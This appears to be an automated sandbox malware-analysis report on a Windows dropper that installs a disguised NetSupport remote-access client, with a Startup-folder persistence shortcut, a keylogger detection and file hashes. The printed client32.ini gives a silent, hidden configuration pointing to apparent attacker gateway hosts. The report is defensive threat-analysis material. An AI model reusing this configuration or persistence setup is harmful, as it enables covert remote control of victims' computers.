SHA-512:	1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	32.7767,-96.797

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autorunins.ini.lnk

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Hidden, Archive, ctime=Fri Nov 1 16:11:03 2024, mtime=Fri Nov 1 16:11:03 2024, atime=Mon Feb 26 22:55:38 2018, length=106864, window=hide
Category:	dropped
Size (bytes):	1893
Entropy (8bit):	3.297429290763084
Encrypted:	false
SSDEEP:	24:8ryV025h9W2IbDOlFA344RlMo7oAjMJoJtm:8ryV02fYmlu34mlMEDgJoJt
MD5:	3DC51D085739FF42C5E4C34063816B2C
SHA1:	9EB88038A24809A71D04A4AC041F1680539A33A3
SHA-256:	95D919B6264E8BDB4B75521565305DC9D2211C43490A5563F2F004D1EF46C2CD
SHA-512:	5152CA1417020A213CC2061F7C57261F1ECC9B905378E25CF862FB38A80CCE43658EEBEC1CB2B3B890D15956B317C8B4EDE3E9A0E8081561E4184694E036CD61
Malicious:	false
Reputation:	low
Preview:	L..................F.@.."....y...,.......,...9.L]...p.........................:..DG..Yr?.D..U..k0.&...&......Qg._........,.......,......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=aY]...........................3N.A.p.p.D.a.t.a...B.V.1.....aYb...Roaming.@......EW.=aYb...............................R.o.a.m.i.n.g.....`.1......X....SUPORT~1..H......aYb.aYb.............................+.S.u.p.o.r.t.U.p.W.i.n.....f.2.p...ZL.".client32.exe..J......aYb.aYb...............................c.l.i.e.n.t.3.2...e.x.e.......j...............-.......i...........0.<.....C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe....a.u.t.o.r.u.n.i.n.s...i.n.i.'.....\.....\.....\.....\.....\.S.u.p.o.r.t.U.p.W.i.n.\.c.l.i.e.n.t.3.2...e.x.e...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.S.u.p.o.r.t.U.p.W.i.n.$.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.1.........%APPDATA%\1.............................................

C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	93560
Entropy (8bit):	6.5461580255883876
Encrypted:	false
SSDEEP:	1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
MD5:	4182F37B9BA1FA315268C669B5335DDE
SHA1:	2C13DA0C10638A5200FED99DCDCF0DC77A599073
SHA-256:	A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
SHA-512:	4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: upd_8707558.msix, Detection: malicious, Browse Filename: information_package.exe, Detection: malicious, Browse Filename: Update_2762895.msix, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........in.:n.:n.:g.6:\|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.7547459359511395
Encrypted:	false
SSDEEP:	6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
MD5:	C94005D2DCD2A54E40510344E0BB9435
SHA1:	55B4A1620C5D0113811242C20BD9870A1E31D542
SHA-256:	3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
SHA-512:	2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Joe Sandbox View:	Filename: Update.js, Detection: malicious, Browse Filename: update.js, Detection: malicious, Browse Filename: Update.js, Detection: malicious, Browse Filename: update.js, Detection: malicious, Browse Filename: updates.js, Detection: malicious, Browse Filename: updates.js, Detection: malicious, Browse Filename: Update 124.0.6367.158.js, Detection: malicious, Browse Filename: updates.js, Detection: malicious, Browse Filename: Update 124.0.6367.158.js, Detection: malicious, Browse Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SuportUpWin\NSM.LIC

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	259
Entropy (8bit):	5.103526864179364
Encrypted:	false
SSDEEP:	6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
MD5:	866C96BA2823AC5FE70130DFAAA08531
SHA1:	892A656DA1EA264C73082DA8C6E5F5728ABCB861
SHA-256:	6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
SHA-512:	0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..

C:\Users\user\AppData\Roaming\SuportUpWin\NSM.ini

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	Generic INItialization configuration [Features]
Category:	dropped
Size (bytes):	6458
Entropy (8bit):	4.645519507940197
Encrypted:	false
SSDEEP:	96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
MD5:	88B1DAB8F4FD1AE879685995C90BD902
SHA1:	3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
SHA-256:	60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
SHA-512:	4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
Malicious:	false
Preview:	..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.292094060787929
Encrypted:	false
SSDEEP:	192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
MD5:	104B30FEF04433A2D2FD1D5F99F179FE
SHA1:	ECB08E224A2F2772D1E53675BEDC4B2C50485A41
SHA-256:	956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
SHA-512:	5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3740024
Entropy (8bit):	6.527276298837004
Encrypted:	false
SSDEEP:	49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
MD5:	D3D39180E85700F72AAAE25E40C125FF
SHA1:	F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
SHA-256:	38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
SHA-512:	471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	396664
Entropy (8bit):	6.80911343409989
Encrypted:	false
SSDEEP:	12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
MD5:	2C88D947A5794CF995D2F465F1CB9D10
SHA1:	C0FF9EA43771D712FE1878DBB6B9D7A201759389
SHA-256:	2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
SHA-512:	E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 6%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............\|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	106864
Entropy (8bit):	4.698068367430546
Encrypted:	false
SSDEEP:	384:qkhNAEVV5+6j6Qa86Fkv2Wr120hZl4gtV5ttV2ikB:qwRVVZl6FhWr80/WgtV7tV2ikB
MD5:	F76954B68CC390F8009F1A052283A740
SHA1:	3112A39AAD950045D6422FB2ABE98BED05931E6C
SHA-256:	63315DF7981130853D75DC753E5776BDF371811BCFCE351557C1E45AFDD1EBFB
SHA-512:	D3AEA0867B488161F62E43E7C250AD3917713B8B183139FB6E06C71594FB0CEC769E1494B7CC257117992AE4AA891E056F99C25431AE19F032B1BA779051A880
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 30%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...y.(Y.....................r...... ........ ....@..................................\|....@.................................< ..<....0...l...........x..p).......... ............................................... ...............................text............................... ..`.rdata..^.... ......................@..@.rsrc....l...0...n..................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SuportUpWin\client32.ini

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	825
Entropy (8bit):	5.376567239934958
Encrypted:	false
SSDEEP:	24:pBrEmPfapz1l11fXtID4nRVUBmuZlfLnYs:pBrEAi11f9I0nRyBmuVLnT
MD5:	39E51AF377AAEEF1B0727E50E7FDECCF
SHA1:	0209CC69414B8A9667BA025782F4E2E01CAD6EC4
SHA-256:	EC74508F2DEA1155DA0CF4EDDC0AA338F6DE75616AD96685EA8972DBDBAA88EF
SHA-512:	D0EF076B5C76E9D9FE4F3ED98CB3A3478C7B48C30CF03169E980D3E68164E0C66FE2152BA909A7CFFDCA7C84DB06ECA9DFDEAAF6D3C24B723A133CF553F1BF4C
Malicious:	false
Preview:	0x6e4b5ede....[Client].._present=1..DisableChat=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RoomSpec=Eval..Shared=1..silent=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=0..Usernames=..ValidAddresses.TCP=....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[Bridge]..PasswordFile=C:\Program Files (x86)\NetSupport\NetSupport Manager\jernder43.psw..Protocol=0....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=pbkvithtosh07.com:1771..GSK=GM<BAFEM9N?CDDHG<KAAFG;I..Port=1771..SecondaryGateway=pbkvithtosh08.com:1771..SecondaryPort=1771....[View]..ScrollDelay=6..

C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dll

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SuportUpWin\nskbfltr.inf

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\Users\user\AppData\Roaming\SuportUpWin\nsm_vpro.ini

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.532048032699691
Encrypted:	false
SSDEEP:	3:lsylULyJGI6csM:+ocyJGIPsM
MD5:	3BE27483FDCDBF9EBAE93234785235E3
SHA1:	360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:	4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:	EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:	false
Preview:	[COMMON]..Storage_Enabled=0..Debug_Level=0....

C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dll

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.7376663312239256
Encrypted:	false
SSDEEP:	768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
MD5:	34DFB87E4200D852D1FB45DC48F93CFC
SHA1:	35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
SHA-256:	2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
SHA-512:	F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SuportUpWin\remcmdstub.exe

Download File

Process:	C:\Users\user\Desktop\hkpqXovZtS.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63864
Entropy (8bit):	6.446503462786185
Encrypted:	false
SSDEEP:	1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
MD5:	6FCA49B85AA38EE016E39E14B9F9D6D9
SHA1:	B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
SHA-256:	FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
SHA-512:	F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.835343377119646
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hkpqXovZtS.exe
File size:	3'338'375 bytes
MD5:	885a317f0e6471b48210a165fa878af7
SHA1:	0beccc1ab4baa6ae9c9a735ecc0719b75031c394
SHA256:	197c2d218121ff0ec738f5d301bf13b7824320c07942b99c9f278e8d7508b15d
SHA512:	6e017371d637ddfd56229cc7ba2da4285b9ab3e6891d11c5b27ff784bcf5063ae1dcc65b51e1445944ae12df1d72791a485f365776ccd245b2a03bde1c05ca08
SSDEEP:	98304:Ol2fRAinZNWMWvrcRoJfr0zVVQrY92iVzc/JFUhdM:M/iZNXWTc5zXQkfI/Ah6
TLSH:	D1F5D093AFEB1278D7AC18FB96F0E20FA7619DC91A96C0D0EB453F46E8F305261D4641
File Content Preview:	MZ......................@...............SENS............................!..L.!This program cannot be run in DOS mode....$.......[.................:.......,.......<...............+.{.....=.......;.......>.....Rich............PE..L......Q.................L.

File Icon


Icon Hash:	0f3352caca713b8f

Static PE Info

General

Entrypoint:	0x4df11c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x518CCAAC [Fri May 10 10:23:40 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	299facae7e3811e3ba17036d8f5262d2

Entrypoint Preview

Instruction
push eax
push ebx
sub esp, 08h
mov eax, dword ptr [esp+18h]
mov dword ptr [esp+04h], eax
mov eax, dword ptr [esp+14h]
mov dword ptr [esp], eax
call 00007F13290D6E44h
mov dword ptr [esp+04h], eax
pop ebx
nop
nop
nop
nop
ret
add byte ptr [ebp-74FBDB9Ch], cl
rcr byte ptr [ecx+edx*2+04244C8Bh], FFFFFF8Dh
dec ecx
or byte ptr [edi-76FBDBB4h], al
dec esp
and al, 04h
mov ecx, dword ptr [esp]
lea esp, dword ptr [esp+04h]
call 00007F13290E9525h
pushfd
add ebp, 1Bh
popfd
lea ebp, dword ptr [ebp-1Bh]
add dword ptr [esp+00h], FFF94395h
xchg dword ptr [esp+00h], ebx
push ecx
mov ecx, dword ptr [esp+04h]
lea ecx, dword ptr [ecx+7Ch]
xchg dword ptr [esp+04h], ecx
mov dword ptr [esp+04h], ecx
mov ecx, dword ptr [esp]
lea esp, dword ptr [esp+04h]
xchg dword ptr [esp+04h], ebx
lea edi, dword ptr [edi]
xchg dword ptr [esp+00h], ebx
push eax
mov eax, dword ptr [esp+04h]
lea eax, dword ptr [eax+27h]
xchg dword ptr [esp+04h], eax
mov dword ptr [esp+04h], eax
mov eax, dword ptr [esp]
lea esp, dword ptr [esp+04h]
popfd
push edi
mov edi, dword ptr [esp+04h]
lea edi, dword ptr [edi+35h]
xchg dword ptr [esp+04h], edi
mov dword ptr [esp+04h], edi
mov edi, dword ptr [esp]
lea esp, dword ptr [esp+04h]
ret
push ebx
mov ebx, dword ptr [esp+04h]
lea ebx, dword ptr [ebx+7Eh]
xchg dword ptr [esp+04h], ebx
mov dword ptr [esp+04h], ebx
mov ebx, dword ptr [esp]
lea esp, dword ptr [esp+04h]
add al, byte ptr [eax+eax+00000000h]

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[EXP] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2aef0	0x33	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfbc7c	0xdc	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x104000	0x250f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x263f0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x28b80	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x26000	0x374	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
